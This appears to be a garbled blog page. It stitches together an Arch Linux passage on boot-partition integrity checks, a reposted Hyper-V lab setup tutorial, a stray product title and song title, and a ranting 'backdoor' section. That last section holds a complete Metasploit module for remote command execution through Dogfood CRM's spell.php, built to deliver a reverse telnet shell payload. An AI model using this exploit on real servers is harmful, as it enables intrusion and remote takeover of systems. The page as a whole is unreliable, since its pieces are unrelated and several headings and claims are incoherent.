Thursday, August 31, 2017

oh please...who want to read Black Hat Mossad...? PART II ANGELFIRE NSA (There is a small caveat for systemd. At the time of writing, the original chkboot.sh script provided contains an empty space at the beginning of #!/bin/bash which has to be removed for the service to start successfully.)

chkboot

Warning: chkboot makes a /boot partition tamper-evident, not tamper-proof. By the time the chkboot script is run, you have already typed your password into a potentially compromised boot loader, kernel, or initrd. If your system fails the chkboot integrity test, no assumptions can be made about the security of your data.
Referring to an article from the ct-magazine (Issue 3/12, page 146, 01.16.2012, [3]) the following script checks files under /boot for changes of SHA-1 hash, inode, and occupied blocks on the hard drive. It also checks the Master Boot Record. The script cannot prevent certain type of attacks, but a lot are made harder. No configuration of the script itself is stored in unencrypted /boot. With a locked/powered-off encrypted system, this makes it harder for some attackers because it is not apparent that an automatic checksum comparison of the partition is done upon boot. However, an attacker who anticipates these precautions can manipulate the firmware to run his own code on top of your kernel and intercept file system access, e.g. to boot, and present the untampered files. Generally, no security measures below the level of the firmware are able to guarantee trust and tamper evidence.
The script with installation instructions is available (Author: Juergen Schmidt, ju at heisec.de; License: GPLv2). There is also package chkbootAUR to install.
After installation add a service file (the package includes one based on the following) and enable it:
[Unit]
Description=Check that boot is what we want
Requires=basic.target
After=basic.target

[Service]
Type=oneshot
ExecStart=/usr/local/bin/chkboot.sh

[Install]
WantedBy=multi-user.target
There is a small caveat for systemd. At the time of writing, the original chkboot.sh script provided contains an empty space at the beginning of #!/bin/bash which has to be removed for the service to start successfully.
As /usr/local/bin/chkboot_user.sh needs to be executed right after login, you need to add it to the autostart (e.g. under KDE -> System Settings -> Startup and Shutdown -> Autostart; GNOME 3: gnome-session-properties).
With Arch Linux, changes to /boot are pretty frequent, for example by new kernels rolling-in. Therefore it may be helpful to use the scripts with every full system update. One way to do so:
#!/bin/bash
#
# Note: Insert your   and execute it with sudo for pacman & chkboot to work automagically
#
echo "Pacman update [1] Quickcheck before updating" & 
sudo -u  /usr/local/bin/chkboot_user.sh  # insert your logged on  
/usr/local/bin/chkboot.sh
sync       # sync disks with any results 
sudo -u  /usr/local/bin/chkboot_user.sh  # insert your logged on  
echo "Pacman update [2] Syncing repos for pacman" 
pacman -Syu
/usr/local/bin/chkboot.sh
sync 
sudo -u  /usr/local/bin/chkboot_user.sh  # insert your logged on 
echo "Pacman update [3] All done, let us roll on ..."

mkinitcpio-chkcryptoboot

Warning: This hook does not encrypt GRUB's core (MBR) code or EFI stub, nor does it protect against situations where an attacker is able to modify the behaviour of the bootloader to compromise the kernel and/or initramfs at run-time.
mkinitcpio-chkcryptobootAUR is a mkinitcpio hook that performs integrity checks during early-userspace and advises the user not to enter his root partition password if the system appears to have been compromised. Security is achieved through an encrypted boot partition, which is unlocked using GRUB's cryptodisk.mod module, and a root filesystem partition, which is encrypted with a password different from the former. This way, the initramfs and kernel are secured against offline tampering, and the root partition can remain secure even if the /boot partition password is entered on a compromised machine (provided that the chkcryptoboot hook detects the compromise, and is not itself compromised at run-time).
This hook requires grub release >=2.00 to function, and a dedicated, LUKS encrypted /boot partition with its own password in order to be secure.

Installation

Install mkinitcpio-chkcryptobootAUR and edit /etc/default/chkcryptoboot.conf. If you want the ability of detecting if your boot partition was bypassed, edit the CMDLINE_NAME and CMDLINE_VALUE variables, with values known only to you. You can follow the advice of using two hashes as is suggested right after the installation. Also, be sure to make the appropriate changes to the kernel command line in /etc/default/grub. Edit the HOOKS= line in /etc/mkinitcpio.conf, and insert the chkcryptoboot hook before encrypt. When finished, rebuild the initramfs.

oh please...who want to read Black Hat lol Mossad..? PART 1

Setting up your Hacking Playground - Hyper-V Quick Setup [Part 2]

By Tony Lee.

In first part of this series, we did a high-level comparison between free versions of VMWare ESXi and Microsoft’s Hyper-V. In this part, we will explore the insane (and absurd) challenge that exists when setting up Hyper-V to be a remotely managed, headless server. Finally, in the last part of the series, we will give you the essentials needed to start using Hyper-V and present the winner of our Geek Playground comparison.

Hyper-V manager installation

Hyper-V Server 2012 installation was smooth--maybe a little too smooth… There has to be a catch, right? Of course there is! The remote management setup is extremely frustrating and unpolished. In fact, I am a little surprised Microsoft released a product that has so many issues. All I want to do is connect to the server from my laptop and manage the VMs! Fortunately, since I had to struggle through the setup, I figured I would document the process to hopefully save you some sleepless nights.

Here comes the ugly so hold on to your knickers!

Downloading and installing the client

Windows 7 Hyper-V Manager can be downloaded as part of Remote Server Administration Tools for Windows 7

Caveat: “**Remote Server Administration Tools for Windows 7 with SP1 can be installed ONLY on computers that are running the Enterprise, Professional, or Ultimate editions of Windows 7 or Windows 7 with SP1.*” -- So no Home Edition… Sorry folks.

Ironically, the Remote Server Administration Tools (RSAT) client took longer to install than the Hyper-V server. Crazy!

Enabling Hyper-V tools

After install, if you are like me, you are wondering why you cannot locate Hyper-V Manager in the start menu. Then it dawns on you that you have to enable that as a Windows feature shown in the screenshot below:



Microsoft’s obfuscation skills increase by 10

Enabling Remote Management

Whew! So, all is good right? We can open Hyper-V manager client and click "Connect" to Server… But when we enter the IP of the remote server we get an error message:

“An error occurred while attempting to connect to server [HOSTNAME]. Check that the Virtual Machine Management service is running and that you are authorized to connect to the server. You do not have the required permission to complete this task. Contact the administrator of the authorization policy for the computer [HOSTNAME].”

Huh?



After Googling around, I found a series of posts by John Howard, a Senior Program Manager in the Hyper-V team. This series of posts included a very detailed, but lengthy, explanation on how to fix this issue. Not placing fault on John here, but in my opinion, maybe Microsoft should just fix the issue? It is hard to imagine that the product would be released with this frustrating limitation. When using VMWare vSphere client, you just enter the IP/Hostname and some credentials--what is so difficult about that?

Fortunately, John Howard was nice enough to also create a tool to do all of this configuration magic for us, the "Hyper-V Remote Management Configuration Utility". However, this is not just any tool, I was amazed to see that it is a 6,300 line VB script! John must be a wizard or something. :)

Hyper-V Remote Management Configuration Utility

Download from:


Copy the hvremote.wsf script to the server - From the server, map the C drive of your client laptop:

 net use * \\laptop\C$ “password” /U:local\[user]

copy z:\users\[user]\Desktop\hvremote.wsd c:\




Setting up Accounts

Since my laptop was already a member of a domain and the server is a member of a workgroup, I used the provided “10 second guide” instructions:

Server Side

Add user syntax:
 net user [username] “[password]” /add

ex:
net user tony “SecretPassword” /add




Grant user access syntax:
 cscript hvremote.wsf /add:[username]

ex:
cscript hvremote.wsf /add:tony




Client Side

 cmdkey /add:[servername] /user:[servername]\[accountname] /pass

ex:
cmdkey /add:VMServer /user:VMServer\tony /pass




Enabling Ping on Hyper-V

On your Hyper-V host, in the blue configuration command prompt (sconfig.cmd):

Select #4: Configure Remote Management -> #3 Configure Server Response to Ping

Added server name to client’s hosts file

From elevated command prompt on client (start -> cmd -> right click -> Run as Administrator):

 write c:\windows\system32\drivers\etc\hosts
[IP address]  [Hostname]

ex:
192.168.2.130   VMServer




Reboot server!

Verify proper functionality

Run the following command on both computers:

 cscript hvremote.wsf /show /target:othercomputername

ex from laptop:
cscript hvremote.wsf /show /target:VMServer

ex from server:
cscript hvremote.wsf /show /target:laptop




You should now be able to bring up Hyper-V Manager and connect to the server



Disk management

Now that we can access the Hyper-V server through Hyper-V Manager, we may need to make our extra disk drives in the server usable. Most people point and click via the GUI, but you can also manage the disks via the command line interface as well. CLI knowledge is critical for the free version of Hyper-V.

To list the logical drive letters, we can use:

 wmic logicaldisk get name,description
Description       Name
Local Fixed Disk  C:
CD-ROM Disc       D:
CD-ROM Disc       E:




We have two extra hard drives (2x2TB) that do not show up as usable. We will fix that with Diskpart.

Diskpart foo

 C:\Users\Administrator>diskpart

Microsoft DiskPart version 6.2.9200

Copyright (C) 1999-2012 Microsoft Corporation.
On computer: VMSERVER

DISKPART> list letter

Microsoft DiskPart version 6.2.9200

DISK        - Display a list of disks. For example, LIST DISK.
PARTITION   - Display a list of partitions on the selected disk.
              For example, LIST PARTITION.
VOLUME      - Display a list of volumes. For example, LIST VOLUME.
VDISK       - Displays a list of virtual disks.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     D                       DVD-ROM         0 B  No Media
  Volume 1     E                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 3                      NTFS   Partition   1862 GB  Healthy
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot




So, we have confirmed that my two DVD burners are D and E… I wanted to change that to F and G and then assign drive letters D and E to my other hard drives.

 DISKPART> select volume 0

Volume 0 is the selected volume.

DISKPART> assign letter=F

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
* Volume 0     F                       DVD-ROM         0 B  No Media
  Volume 1     E                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot





Now, for the other one:
 DISKPART> select volume 1

Volume 1 is the selected volume.

DISKPART> assign letter=G

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     F                       DVD-ROM         0 B  No Media
* Volume 1     G                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot




Now, to partition, format and assign drive letters to the other disks:
 DISKPART> list disk

  Disk ###  Status         Size     Free     Dyn  Gpt
  --------  -------------  -------  -------  ---  ---
  Disk 0    Online         1863 GB  1862 GB
  Disk 1    Online         1863 GB  1863 GB        *
* Disk 2    Online          167 GB      0 B

DISKPART> select disk 0

Disk 0 is now the selected disk.

DISKPART> list partition

  Partition ###  Type              Size     Offset
  -------------  ----------------  -------  -------
  Partition 1    Primary            350 MB  1024 KB

DISKPART> create partition primary

DiskPart succeeded in creating the specified partition.

DISKPART> list partition

  Partition ###  Type              Size     Offset
  -------------  ----------------  -------  -------
  Partition 1    Primary            350 MB  1024 KB
* Partition 2    Primary           1862 GB   351 MB

DISKPART> format fs=ntfs quick

  100 percent completed

DiskPart successfully formatted the volume.

DISKPART> assign letter=D

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     F                       DVD-ROM         0 B  No Media
  Volume 1     G                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
* Volume 3     D                NTFS   Partition   1862 GB  Healthy
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot





Now, for the last drive:

 DISKPART> list disk

  Disk ###  Status         Size     Free     Dyn  Gpt
  --------  -------------  -------  -------  ---  ---
* Disk 0    Online         1863 GB      0 B
  Disk 1    Online         1863 GB  1863 GB        *
  Disk 2    Online          167 GB      0 B

DISKPART> select disk 1

Disk 1 is now the selected disk.

DISKPART> list partition

There are no partitions on this disk to show.

DISKPART> create partition primary

DiskPart succeeded in creating the specified partition.

DISKPART> list partition

  Partition ###  Type              Size     Offset
  -------------  ----------------  -------  -------
* Partition 1    Primary           1863 GB  1024 KB

DISKPART> format fs=ntfs quick

  100 percent completed

DiskPart successfully formatted the volume.

DISKPART> assign letter=E

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     F                       DVD-ROM         0 B  No Media
  Volume 1     G                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 3     D                NTFS   Partition   1862 GB  Healthy
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot
* Volume 5     E                NTFS   Partition   1863 GB  Healthy

DISKPART> exit

Leaving DiskPart...

C:\Users\Administrator>e:

E:\>dir
 Volume in drive E has no label.
 Volume Serial Number is 2015-54E4

 Directory of E:\

File Not Found

E:\>d:

D:\>dir
 Volume in drive D has no label.
 Volume Serial Number is 5CC4-3887

 Directory of D:\

File Not Found





Finally! We can use all of the hard drives: 


http://blog.opensecurityresearch.com/2013/04/setting-up-your-hacking-playground_30.html

How to shave pubic hair | All Purpose Gillette STYLER

DOGFOOD NSA RUSSIAN CYBER INTEL ...BACKDOOR

Hi everybody! welcome back to war! last nigh "gazer" no such thing as email phisphing ...bullshit! and Cerlet is a spy. Here's the remote App

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Dogfood CRM spell.php Remote Command Execution',
            'Description'    => %q{
                    This module exploits a previously unpublished vulnerability in the
                Dogfood CRM mail function which is vulnerable to command injection
                in the spell check feature.  Because of character restrictions, this
                exploit works best with the double-reverse telnet payload. This
                vulnerability was discovered by LSO and affects v2.0.10.
            },
            'Author'         =>
                [
                    'LSO ', # Exploit module
                    'patrick', # Added check code, QA tested ok 20090303, there are no references (yet).
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 9669 $',
            'References'     =>
                [
                    [ 'OSVDB', '54707' ],
                    [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],
                ],
            'Privileged'     => false,
            'Platform'       => ['unix'], # patrickw - removed win, linux -> untested
            'Arch'           => ARCH_CMD,
            'Payload'        =>
                {
                    'Space'       => 1024,
                    'DisableNops' => true,
                    'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic perl ruby bash telnet',
                        }
                },
            'Targets'        => [ ['Automatic', { }], ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 03 2009'
            ))
 
        register_options(
            [
                OptString.new('URIPATH',   [ true"The URI of the spell checker", '/dogfood/mail/spell.php']),
            ], self.class)
 
    end
 
    def check
        res = send_request_raw(
            {
                'uri' => datastore['URIPATH'],
            }, 1)
 
        if (res.body =~ /Spell Check complete/)
            return Exploit::CheckCode::Detected
        end
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        timeout = 1
 
        cmd = payload.encoded
        data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
        uri = datastore['URIPATH']
 
        response = send_request_cgi(
            {
            'uri' => uri,
            'method' => "POST",
            'data' => data
            },
        timeout)
 
        handler
    end
end

Dogfood CRM - spell.php Remote Command Execution (Metasploit). Webapps exploit for PHP platform. Tags: Metasploit Framework
EXPLOIT-DB.COM



Cielo e terra (duet with Dante Thomas)